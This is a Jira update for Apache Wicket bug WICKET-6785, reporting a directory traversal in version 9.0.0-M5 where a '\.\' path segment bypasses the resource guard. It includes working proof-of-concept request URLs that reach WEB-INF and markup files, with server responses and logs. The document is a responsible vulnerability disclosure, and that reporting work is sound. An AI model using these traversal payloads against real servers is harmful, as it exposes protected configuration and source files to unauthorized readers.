[ https://issues.apache.org/jira/browse/WICKET-6785?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Mariusz Popłwski updated WICKET-6785: ------------------------------------- Summary: Wicket directory traversal to root package - read file out of scope (was: Wicket directory traversal to root package - read wicker markup files) > Wicket directory traversal to root package - read file out of scope > ------------------------------------------------------------------- > > Key: WICKET-6785 > URL: https://issues.apache.org/jira/browse/WICKET-6785 > Project: Wicket > Issue Type: Bug > Components: wicket-core > Affects Versions: 9.0.0-M5 > Environment: Default installation of wicket from > https://wicket.apache.org/start/quickstart.html > Allow to reproduce above vulnerability. > mvn archetype:generate -DarchetypeGroupId=org.apache.wicket > -DarchetypeArtifactId=wicket-archetype-quickstart -DarchetypeVersion=9.0.0-M5 > -DgroupId=com.mycompany -DartifactId=myproject > -DarchetypeRepository=https://repository.apache.org/ -DinteractiveMode=false > Reporter: Mariusz Popłwski > Priority: Major > Attachments: project_root.png, wicket-poc1.png, wicket-poc2.png, > wicket-poc3.png > > > Unauthorized user is allowed to read files out of allowed scope by combine of > directory traversal and bypass of guard protection. > > Security risk is medium due to next protection of guard default files > extension white list, in case of bypass this restriction this security > vulnerability may be critical, we are even allow to ask for serve > WEB-INF\web.xml but guard block our attempt. > > User is able to escape root with use of directory traversal "..\..\" key of > the vulnerability is to use "\.\" current directory mark on the end of query > which led to bypass guard protection. > > *Proof of concepts.* > > Request: > > {code:java} > https://192.168.1.11:8443/wicket/resource/org.apache.wicket.Application/..\..\..\.\WEB-INF\web.xml{code} > > > {code:java} > org.apache.wicket.request.resource.PackageResource$PackageResourceBlockedException: > Access denied to (static) package resource ././WEB-INF/web.xml. See > IPackageResourceGuard{code} > > > Request: > > {code:java} > https://192.168.1.11:8443/wicket/resource/org.apache.wicket.Application/..\..\..\.\WEB-INF\file_in_web_inf.txt{code} > > Response: > > {code:java} > HTTP/1.1 200 OK > Connection: close > Date: Thu, 14 May 2020 11:37:34 GMT > Last-Modified: Thu, 14 May 2020 11:36:38 GMT > Expires: Fri, 14 May 2021 11:37:34 GMT > Cache-Control: private > Cache-Control: max-age=31536000 > Pragma: cache > Content-Disposition: inline > Content-Type: text/plain > Accept-Range: bytes > Content-Length: 4 > Server: Jetty(9.4.27.v20200227) > 1337 > {code} > > My app structure: > > {code:java} > src/ > main/ > java/ > com.mycompany > fileupload/ > FileUploadPanel.class > HomePage.class > HomepPage.html > javaroot.png > WicketApplication.class > resource/ > webapp/ > WEB-INF/ > file_in_web_inf.txt > web.xml > test/ > {code} > > > > *Bypass file read block by guard from java/ packages dir.* > ------------------------ > Trying to read file "javaroot.png" from java/ folder > Request: > > {code:java} > https://192.168.1.11:8443/wicket/resource/com.mycompany.HomePage/..\..\javaroot.png{code} > *Server log:* > > > {code:java} > [qtp1521118594-25] WARN org.apache.wicket.markup.html.PackageResourceGuard - > Access to root directory is by default disabled for shared resources: > javaroot.png[qtp1521118594-25] WARN RequestCycleExtra - > ********************************[qtp1521118594-25] WARN RequestCycleExtra - > Handling the following > exceptionorg.apache.wicket.request.resource.PackageResource$PackageResourceBlockedException: > Access denied to (static) package resource javaroot.png. See > IPackageResourceGuard at > org.apache.wicket.request.resource.PackageResource.internalGetResourceStream(PackageResource.java:584) > {code} > > > User Output: > > {code:java} > Last cause: Access denied to (static) package resource javaroot.png. See > IPackageResourceGuard<br/>{code} > > > Bypass using \.: > > {code:java} > https://192.168.1.11:8443/wicket/resource/com.mycompany.HomePage/..\..\.\javaroot.png > {code} > User partial oputput: > > {code:java} > HTTP/1.1 200 OK > Connection: close > Date: Thu, 14 May 2020 11:09:14 GMT > Last-Modified: Wed, 13 May 2020 18:11:09 GMT > Expires: Fri, 14 May 2021 11:09:14 GMT > Cache-Control: private > Cache-Control: max-age=31536000 > Pragma: cache > Content-Disposition: inline > Content-Type: image/png > Accept-Range: bytes > Content-Length: 12244 > Server: Jetty(9.4.27.v20200227) > PNG..... > {code} > > > > *Bypass markup file read block guard* > ------------------------ > > Dir traversal allowing us to get into other package but still we are > forbidden to preview of Wicket markup files > > {code:java} > https://192.168.1.11:8443/wicket/resource/org.apache.wicket.Application/..\..\..\com/mycompany/HomePage.html?{code} > > Error on server side: > > {code:java} > [qtp1521118594-30] WARN org.apache.wicket.markup.html.PackageResourceGuard - > Access denied to shared (static) resource because it is a Wicket markup file: > com/mycompany/HomePage.html{code} > > User output > > {code:java} > :Last cause: Access denied to (static) package resource > com/mycompany/HomePage.html. See IPackageResourceGuard<br/>{code} > > Bypass: > > {code:java} > https://192.168.1.11:8443/wicket/resource/org.apache.wicket.Application/..\..\..\.\com/mycompany/HomePage.html?{code} > > User output: > > > {code:java} > HTTP/1.1 200 OK > Connection: close > Date: Thu, 14 May 2020 11:10:05 GMT > Last-Modified: Thu, 14 May 2020 10:54:40 GMTExpires: Fri, 14 May 2021 > 11:10:05 GMT > Cache-Control: private > Cache-Control: max-age=31536000 > Pragma: cache > Content-Disposition: inline > Content-Type: text/html > Accept-Range: bytes > Content-Length: 640 > Server: Jetty(9.4.27.v20200227) > <!DOCTYPE html><html xmlns:wicket="http://wicket.apache.org"> <head> <meta > charset="utf-8" /> <title>Apache Wicket Quickstart</title> <link > href='http://fonts.googleapis.com/css?family=Yanone+Kaffeesatz:regular,bold' > rel='stylesheet' type='text/css' /> <link rel="stylesheet" href="style.css" > type="text/css" media="screen" title="Stylesheet" /> </head> <body> <div > id="hd"> <div id="logo"> <img src="logo.png" width="50px" height="50px" > alt="Wicket Logo" /> <h1>Apache Wicket</h1> </div> </div> <div id="bd"> > <div wicket:id="fileUpload"></div> </div> <div id="ft"> </div> > </body></html> > {code} > -- This message was sent by Atlassian Jira (v8.3.4#803005)